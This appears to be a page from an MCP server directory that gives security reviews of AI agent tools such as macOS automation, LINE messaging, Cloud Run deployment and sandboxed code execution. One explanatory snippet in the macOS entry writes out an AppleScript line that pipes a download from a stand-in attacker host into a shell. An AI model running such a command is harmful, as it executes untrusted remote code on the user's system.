Stop Searching. Start Trusting.

The curated directory of MCP servers, vetted for security, efficiency, and quality.

Tired of the MCP "Marketplace" Chaos?

We built MCPScout.ai to solve the ecosystem's biggest pain points.

No Insecure Dumps

We manually analyze every server for basic security flaws.

Easy Setup

Our gotcha notes warn you about complex setups.

Avoid "Token Hogs"

We estimate each server's token cost so you can build cost-effective agents.

Products, Not Demos

We filter out "Hello World" demos.


Vetted Servers (7632)

97
498
Medium Cost
Sec7

Transforms an AI assistant into a macOS automation agent, allowing it to execute AppleScript and JavaScript for Automation (JXA) commands to control applications and system functions.

Setup Requirements

  • ⚠️Requires macOS as the operating system.
  • ⚠️Requires explicit user-granted macOS Automation and Accessibility permissions for the application running the server (e.g., Terminal, Node.js).
  • ⚠️Requires Node.js version >= 18.0.0.
Review Required
The server's core functionality involves executing arbitrary AppleScript/JXA code, either directly provided by the client or sourced from its knowledge base, via `osascript`. This grants high privileges to the executing AI, including the ability to run shell commands (`do shell script`) and interact with the file system and other applications. While placeholder substitution includes escaping, it cannot mitigate malicious logic within the scripts themselves. Network requests can be made from JXA scripts via the Objective-C bridge, potentially exposing data or fetching malicious content. The README explicitly highlights the critical need for user-granted macOS Automation and Accessibility permissions, indicating a high-trust environment is required. If the AI agent itself is compromised or unconstrained, it could pose significant risks.
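The limit of placeholder escaping noted above can be seen in a minimal sketch (a hypothetical helper, not the server's actual code): escaping keeps a hostile value trapped inside a quoted string literal, but it cannot do anything about a script whose logic is itself malicious.

```python
def escape_applescript(value: str) -> str:
    """Escape backslashes and quotes so `value` stays inside an AppleScript string literal."""
    return value.replace("\\", "\\\\").replace('"', '\\"')

# Escaping keeps a hostile value trapped inside the quotes...
user_input = 'hello" -- attempted breakout'
snippet = f'display dialog "{escape_applescript(user_input)}"'

# ...but it cannot help when the whole script is attacker-chosen:
malicious = 'do shell script "curl evil.example | sh"'  # nothing here to escape
```

This is why the analysis treats escaping as necessary but insufficient: the trust boundary is the script source, not the string quoting.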
Updated: 2025-12-02 · GitHub
97
412
Low Cost

mcpstore

by whillhill

Sec7

MCPStore acts as an orchestration layer for managing Model Context Protocol (MCP) services and adapting them as tools for AI frameworks such as LangChain, AutoGen, and others.

Setup Requirements

  • ⚠️Requires `fastmcp` to be installed (e.g., `pip install fastmcp`).
  • ⚠️Specific AI framework adapters (e.g., LangChain) require additional optional dependencies (e.g., `pip install mcpstore[langchain]`).
  • ⚠️For Redis backend, a running Redis instance is required.
Verified Safe
Default FastAPI CORS `allow_origins=["*"]` should be restricted in production environments. Redis sensitive configuration (URL, password) is not loaded from environment variables by default, which could lead to accidental hardcoding in user code if not managed carefully. Hub services run in subprocesses and expose HTTP endpoints; proper authentication and network isolation are responsibilities of the deployer.
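The accidental-hardcoding risk flagged above is avoided by reading Redis settings from the environment; a minimal sketch, using hypothetical variable names (MCPSTORE_REDIS_URL and MCPSTORE_REDIS_PASSWORD are assumptions, not official mcpstore settings):

```python
import os

def redis_config_from_env() -> dict:
    # Pull connection details from the environment so secrets never land in source code.
    return {
        "url": os.environ.get("MCPSTORE_REDIS_URL", "redis://localhost:6379/0"),
        "password": os.environ.get("MCPSTORE_REDIS_PASSWORD"),  # None if unset
    }
```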
Updated: 2025-12-05 · GitHub
97
503
Medium Cost

Integrates LINE Messaging API with AI Agents to enable automated communication and rich menu management for LINE Official Accounts.

Setup Requirements

  • ⚠️Requires Node.js v20+ (or a Docker environment with Chromium dependencies for image generation).
  • ⚠️Requires a LINE Official Account with Messaging API enabled and a Channel Access Token.
  • ⚠️DESTINATION_USER_ID is optional, but it must be set if `userId` is not supplied to the messaging tools.
Verified Safe
The server correctly uses environment variables for sensitive tokens. However, the `create_rich_menu` tool utilizes Puppeteer with the `--no-sandbox` argument to render rich menu images, where user-provided `chatBarText` and action `label` fields are embedded into an HTML template. While input validation (Zod) is present for general structure, if malicious HTML/JavaScript is injected into these text fields and not sufficiently sanitized by the Marp rendering process, it could potentially be executed within the unsandboxed Puppeteer instance, posing a security risk. This is noted as a preview version, suggesting it may not be production-hardened.
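The injection path described above closes if user-supplied text is escaped before being embedded in the HTML template; a minimal sketch with the standard library (field and function names here are hypothetical):

```python
import html

def render_chat_bar(chat_bar_text: str) -> str:
    # Escape <, >, &, and quotes so the value cannot break out of the markup
    # and execute in the (unsandboxed) rendering browser.
    safe = html.escape(chat_bar_text, quote=True)
    return f'<div class="chat-bar">{safe}</div>'
```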
Updated: 2025-12-10 · GitHub
97
483
Medium Cost

cloud-run-mcp

by GoogleCloudPlatform

Sec9

Enables MCP-compatible AI agents to deploy applications to Google Cloud Run, facilitating automated code deployment from various AI-powered development tools.

Setup Requirements

  • ⚠️Requires Google Cloud SDK installation and authentication (gcloud auth login, gcloud auth application-default login).
  • ⚠️Requires an active Google Cloud account with billing enabled.
  • ⚠️For local execution, Node.js (LTS version) or Docker must be installed.
Verified Safe
The server leverages official Google Cloud SDKs and services such as Cloud Build and Artifact Registry for its deployment pipeline. It includes DNS rebinding protection (ENABLE_HOST_VALIDATION, ALLOWED_HOSTS), although both are disabled by default. The SKIP_IAM_CHECK variable, defaulting to 'true', makes deployed Cloud Run services publicly accessible; this is a common configuration, but it leaves securing the deployed application to the user. There are no obvious signs of 'eval', obfuscation, or unsanitized shell command execution. Authentication relies on Google Cloud Application Default Credentials, which promotes secure credential handling.
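The DNS rebinding protection mentioned in the analysis amounts to checking each request's Host header against an allowlist; a minimal sketch of the idea (the parsing below is an assumption for illustration, not the server's implementation):

```python
import os

# Mirrors the ALLOWED_HOSTS environment variable named in the analysis.
ALLOWED_HOSTS = set(os.environ.get("ALLOWED_HOSTS", "localhost,127.0.0.1").split(","))

def host_allowed(host_header: str) -> bool:
    # A DNS-rebinding attack arrives carrying a foreign Host header; reject
    # anything not on the allowlist. Strip a ":port" suffix before comparing.
    return host_header.split(":")[0] in ALLOWED_HOSTS
```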
Updated: 2025-12-11 · GitHub
97
460
Medium Cost
Sec6

Provides Next.js development tools and utilities for coding agents to assist with debugging, upgrades, documentation, and browser automation.

Setup Requirements

  • ⚠️Requires Node.js v20.9+.
  • ⚠️Requires a clean Git working directory before running codemods for Next.js upgrades.
  • ⚠️Monorepo users must run the upgrade workflow on each individual Next.js app directory, not at the monorepo root.
Verified Safe
The 'browser_eval' tool includes an 'evaluate' action which can execute arbitrary JavaScript in a browser context. While this is within a sandboxed browser, it grants significant code execution capabilities to the AI agent, posing a risk if the agent is compromised to execute malicious scripts. The tool also interacts with local Next.js development servers, which is intended behavior but could be a vector for a compromised agent.
Updated: 2025-12-12 · GitHub
96
348
Medium Cost

GhidrAssistMCP

by jtang613

Sec7

Enables AI assistants and other tools to interact with Ghidra's reverse engineering capabilities through a standardized Model Context Protocol (MCP) API.

Setup Requirements

  • ⚠️Requires Ghidra 11.4+ (specific version constraint)
  • ⚠️Requires an MCP client (e.g., GhidrAssist) to interact with it, since it is an API server rather than a standalone application
  • ⚠️Server operates on port 8080 by default; ensure port availability or configure otherwise in Ghidra's UI
Verified Safe
The server binds to a configurable host and port (defaulting to localhost:8080). While running on localhost is relatively safe, if configured to bind to 0.0.0.0 or another external IP, it exposes Ghidra's powerful modification APIs (e.g., renaming functions, setting data types, creating structures from C definitions) to any client with network access without authentication or authorization. This design decision prioritizes ease of integration for AI clients over network-level security. Users must ensure proper network isolation if exposing the server.
Updated: 2025-11-29 · GitHub
96
371
Medium Cost
Sec8

A TypeScript SDK for building multi-provider AI agents that chain LLM reasoning with external tools and orchestrate multi-agent workflows.

Setup Requirements

  • ⚠️Requires API keys for LLM providers (e.g., OpenAI, Anthropic, Mistral), which are often paid services.
  • ⚠️Requires external MCP (Model Context Protocol) servers to be running for tool integration, as demonstrated in the 'Hello World' example (e.g., 'http://localhost:8001/mcp').
  • ⚠️Requires a Node.js/TypeScript development environment.
Verified Safe
The SDK relies on environment variables for API keys, which is a good practice. It connects to various external LLM providers and can connect to user-defined MCP server URLs. While the SDK itself doesn't show obvious vulnerabilities like 'eval' or obfuscation, the overall security depends on the secure management of API keys, the trustworthiness of the connected LLM providers, and the security of any custom MCP servers integrated.
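The environment-variable pattern the analysis praises looks roughly like this in practice (a generic sketch; the variable name and helper are illustrative, and real names vary by provider):

```python
import os

def require_api_key(var: str) -> str:
    # Fail fast with a clear error instead of issuing requests with a missing key.
    key = os.environ.get(var)
    if not key:
        raise RuntimeError(f"Set {var} in the environment; never hardcode API keys.")
    return key
```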
Updated: 2025-11-18 · GitHub
96
339
High Cost

MCP

by jina-ai

Sec9

A remote Model Context Protocol (MCP) server that provides access to Jina AI's Reader, Embeddings, and Reranker APIs with a suite of URL-to-markdown, web search, image search, and semantic deduplication/reranking tools for LLMs.

Setup Requirements

  • ⚠️Requires a Jina AI API Key for most tools and to bypass rate limits on 'optional' tools (a free key is available, but usage may be charged for paid tiers).
  • ⚠️The server is explicitly designed for deployment on Cloudflare Workers, necessitating a Cloudflare account and use of the Wrangler CLI for deployment.
  • ⚠️Specific client-side JSON configuration is required for various LLM clients (e.g., LM Studio, Claude Code, OpenAI Codex, Cursor) to correctly integrate the MCP server, often including API key injection.
Verified Safe
No direct use of 'eval' or other obviously dangerous dynamic code execution functions found. External API calls to Jina AI services require a Jina AI API key, handled via `Authorization` header or environment variables. The `show_api_key` tool is noted as a debug feature for the client to retrieve its own bearer token. The server is designed for deployment on Cloudflare Workers, benefiting from its secure serverless execution environment. URL normalization and HTML parsing for datetime guessing are implemented with reasonable care. Overall, the security posture is strong, relying primarily on the security of upstream Jina AI APIs and proper API key management by the user.
Updated: 2025-12-13 · GitHub
96
352
High Cost

archestra

by archestra-ai

Sec9

A centralized AI platform that orchestrates Model Context Protocol (MCP) servers, providing security, cost management, and observability for LLM interactions and tool usage.

Setup Requirements

  • ⚠️Requires Docker or Kubernetes for deployment.
  • ⚠️Requires a PostgreSQL database for persistent storage.
  • ⚠️Integration with LLM providers (e.g., OpenAI, Anthropic, Google Gemini) requires their respective API keys, which are often paid services.
Verified Safe
The platform demonstrates a strong focus on security, actively implementing features to mitigate common LLM-related risks such as prompt injections and data exfiltration (e.g., Dual LLM, Trusted Data Policies, Tool Invocation Policies). It uses non-root containers and integrates with secret managers (like Vault) for sensitive data. Minor use of `node -e` is limited to test scripts and does not appear in production paths.
Updated: 2025-12-14 · GitHub
95
218
Low Cost
Sec7

Automate Power BI semantic model development and management using AI agents via the MCP protocol.

Setup Requirements

  • ⚠️Requires Visual Studio Code
  • ⚠️Requires GitHub Copilot and GitHub Copilot Chat extensions (Paid subscription may be required)
  • ⚠️Requires connection to an existing Power BI semantic model (Desktop, Fabric, or PBIP files)
Verified Safe
The project explicitly warns about the risks of connecting AI agents to semantic models, including unintended changes, exposure of sensitive information, and the need for backups. It highlights that autonomous or misconfigured clients may perform destructive actions and recommends applying least-privilege RBAC roles. Credentials are handled securely via the Azure Identity SDK, and no 'eval', obfuscation, or hardcoded secrets were identified in the provided truncated code. The security documentation emphasizes Microsoft security guidance for MCP servers.
Updated: 2025-12-04 · GitHub
95
258
Low Cost

This server enables LLM agents to execute Python code in a highly secure, isolated container environment, facilitating complex multi-tool orchestration and data analysis with minimal LLM context token usage.

Setup Requirements

  • ⚠️Requires Podman or Docker (rootless configuration is the default and recommended).
  • ⚠️Requires Python 3.11+ (Python 3.14-slim is the default container image).
  • ⚠️Requires `uv` or `pip` for dependency management (`uv` recommended for installation).
  • ⚠️Pydantic >= 2.12.0 is needed for Python 3.14+ to avoid `TypeError: _eval_type() got an unexpected keyword argument 'prefer_fwd_module'`.
Verified Safe
The server executes user-provided Python code using `eval(compile(code, ...), ...)` within a highly restricted, rootless container sandbox. This sandbox enforces strict isolation: no network, read-only rootfs, all capabilities dropped, no new privileges, unprivileged user (65534:65534), and resource limits (memory, PIDs, CPU, timeout). All MCP traffic is mediated by the host, providing an audit trail and preventing direct access to the host or external networks. While `eval` is used, it is the core function of the isolated sandbox, not a direct vulnerability in this hardened setup. The project's history explicitly details lessons from failed insecure prototypes, indicating a strong architectural commitment to security.
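The execution mechanism described above, `eval(compile(...))` over agent-supplied source, can be illustrated in miniature; the real server wraps this in a rootless container with no network and strict resource limits, which this sketch does not reproduce:

```python
agent_code = """
import math
result = sum(math.isqrt(n) for n in range(10))
"""

namespace = {}
# compile(..., "exec") builds a code object from the source; eval() then runs it
# with `namespace` as its globals, so results are read back out of the dict.
eval(compile(agent_code, "<agent>", "exec"), namespace)
print(namespace["result"])
```

The host reads results out of the namespace dict rather than trusting anything the code prints, which matches the mediated-traffic design the analysis describes.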
Updated: 2025-12-05 · GitHub
95
223
Medium Cost

Windows-MCP.Net

by AIDotNet

Sec3

Enabling AI assistants to automate tasks and interact with the Windows desktop environment.

Setup Requirements

  • ⚠️Requires Windows Operating System
  • ⚠️Requires .NET 10.0 Runtime or higher
  • ⚠️Requires appropriate Windows administrative permissions to perform desktop automation operations
Review Required
The server grants broad access to Windows desktop operations, including PowerShell execution, file system manipulation, and UI control. While intended for AI automation, this poses significant security risks if the AI agent or server itself is compromised or misused, potentially leading to data loss, system compromise, or unauthorized actions. There is no visible sandboxing or fine-grained permission control for AI actions described, and the tool requires appropriate Windows permissions (potentially administrative) to function, making it a high-risk component if its inputs are not strictly controlled.
Updated: 2025-11-27 · GitHub
Page 13 of 636